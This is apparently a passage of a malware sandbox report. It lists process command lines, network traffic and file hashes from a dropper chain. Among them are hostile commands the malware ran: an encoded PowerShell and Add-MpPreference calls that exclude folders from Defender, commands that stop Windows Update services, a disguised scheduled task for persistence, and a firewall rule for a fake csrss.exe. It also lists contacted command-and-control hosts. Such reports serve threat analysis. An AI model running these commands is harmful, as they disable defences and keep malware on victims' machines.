C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 8632 -ip 8632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8632 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\F9AD.exe

C:\Users\Admin\AppData\Local\Temp\F9AD.exe

C:\Users\Admin\AppData\Local\Temp\FA89.exe

C:\Users\Admin\AppData\Local\Temp\FA89.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6692 -ip 6692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 784

C:\Users\Admin\AppData\Local\Temp\214C.exe

C:\Users\Admin\AppData\Local\Temp\214C.exe

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\26CC.exe

C:\Users\Admin\AppData\Local\Temp\26CC.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3132 /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\E2BA.exe

C:\Users\Admin\AppData\Local\Temp\E2BA.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 www.paypal.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 52.2.199.143:443 www.epicgames.com tcp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 twitter.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 23.222.49.98:443 steamcommunity.com tcp
US 8.8.8.8:53 www.facebook.com udp
US 104.244.42.65:443 twitter.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 143.199.2.52.in-addr.arpa udp
US 8.8.8.8:53 98.49.222.23.in-addr.arpa udp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 8.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 104.244.42.194:443 api.twitter.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 192.229.220.133:443 video.twimg.com tcp
US 192.229.233.50:443 pbs.twimg.com tcp
US 104.244.42.69:443 t.co tcp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 133.220.229.192.in-addr.arpa udp
US 8.8.8.8:53 50.233.229.192.in-addr.arpa udp
US 8.8.8.8:53 69.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.182:443 i.ytimg.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 182.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.72.252.171:80 apps.identrust.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 169.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 54.205.234.65:443 tracking.epicgames.com tcp
US 8.8.8.8:53 22.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 65.234.205.54.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 58.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 176.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 133.2.101.151.in-addr.arpa udp
US 151.101.2.133:443 www.paypalobjects.com tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 c.paypal.com udp
US 8.8.8.8:53 facebook.com udp
US 157.240.5.35:443 facebook.com tcp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 192.55.233.1:443 tcp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 c6.paypal.com udp
US 151.101.1.35:443 c6.paypal.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 login.steampowered.com udp
NL 23.222.49.98:443 login.steampowered.com tcp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 api.steampowered.com udp
NL 23.222.49.98:443 api.steampowered.com tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
US 104.244.42.194:443 api.twitter.com tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 120.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 90.219.19.104.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.39.98:443 googleads.g.doubleclick.net tcp
NL 142.251.39.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 api.hcaptcha.com udp
US 8.8.8.8:53 rr5---sn-q4flrn7r.googlevideo.com udp
US 209.85.165.106:443 rr5---sn-q4flrn7r.googlevideo.com tcp
US 209.85.165.106:443 rr5---sn-q4flrn7r.googlevideo.com tcp
US 209.85.165.106:443 rr5---sn-q4flrn7r.googlevideo.com tcp
US 8.8.8.8:53 106.165.85.209.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 209.85.165.106:443 rr5---sn-q4flrn7r.googlevideo.com tcp
RU 5.42.92.51:19057 tcp
US 209.85.165.106:443 rr5---sn-q4flrn7r.googlevideo.com tcp
US 209.85.165.106:443 rr5---sn-q4flrn7r.googlevideo.com tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 185.174.136.219:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 host-host-file8.com udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 95.214.26.28:80 host-host-file8.com tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
RU 5.42.92.51:19057 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe

MD5 b84f9bf2ee0e1a7a17deae15ee6576a9
SHA1 d5a2417ca2d3b3589f55ed56da8f549f442ab573
SHA256 9585e0122dff798b0ab79d1c8a358825ca467237b7da74b24b894f6eba5da8e3
SHA512 3c0be1ac3c45cd29f052d0dc42a5e4bf3b88606c2a6e8186ae273cab19adf435cb0f0685fabeef58b959d4a775ea1d9d9ea1785db83c248438781cc8db375606

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe

MD5 b84f9bf2ee0e1a7a17deae15ee6576a9
SHA1 d5a2417ca2d3b3589f55ed56da8f549f442ab573
SHA256 9585e0122dff798b0ab79d1c8a358825ca467237b7da74b24b894f6eba5da8e3
SHA512 3c0be1ac3c45cd29f052d0dc42a5e4bf3b88606c2a6e8186ae273cab19adf435cb0f0685fabeef58b959d4a775ea1d9d9ea1785db83c248438781cc8db375606

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe

MD5 827be976bc76a5c72a5725aa157c89b1
SHA1 c26074668eee4df7634afeff5824d68086cc215d
SHA256 868270a9a0cf82f22714fa8ff7386142573b7a5c874207c894e6b7e533b5a7b0
SHA512 370defbff597d6143780eae26f98ada1b32e1def39d8af20698f06744bf3f48d7c93d8cfb9152f627d44bbaf5318962df13e0d719b6431ffad7658bc3f5da116

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe

MD5 827be976bc76a5c72a5725aa157c89b1
SHA1 c26074668eee4df7634afeff5824d68086cc215d
SHA256 868270a9a0cf82f22714fa8ff7386142573b7a5c874207c894e6b7e533b5a7b0
SHA512 370defbff597d6143780eae26f98ada1b32e1def39d8af20698f06744bf3f48d7c93d8cfb9152f627d44bbaf5318962df13e0d719b6431ffad7658bc3f5da116

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe

MD5 e4509670e5ae82e9a2ab6eab20388f2e
SHA1 e9bfc22ceb5b5dc94904c66cbfcc2ee472eabde5
SHA256 2a2876a0ee9f1fde3863866216ece202ce6b5255696ef0ac7c77bedf7821bbc7
SHA512 f6f1b26f8fd2b08b3cb2e673563c074e2e061fde5ff11e0bd8cfaa570dfb00b6740d41c6c9d1e1d3212f5b05284973064f09a8bcd05ec296fe931fdc45a1206b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe

MD5 e4509670e5ae82e9a2ab6eab20388f2e
SHA1 e9bfc22ceb5b5dc94904c66cbfcc2ee472eabde5
SHA256 2a2876a0ee9f1fde3863866216ece202ce6b5255696ef0ac7c77bedf7821bbc7
SHA512 f6f1b26f8fd2b08b3cb2e673563c074e2e061fde5ff11e0bd8cfaa570dfb00b6740d41c6c9d1e1d3212f5b05284973064f09a8bcd05ec296fe931fdc45a1206b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8992ae6e99b277eea6fb99c4f267fa3f
SHA1 3715825c48f594068638351242fac7fdd77c1eb7
SHA256 525038333c02dff407d589fa407b493b7962543e205c587feceefbc870a08e3d
SHA512 a1f44fff4ea76358c7f2a909520527ec0bbc3ddcb722c5d1f874e03a0c4ac42dac386a49ccf72807ef2fa6ccc534490ad90de2f699b1e49f06f79157f251ab25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

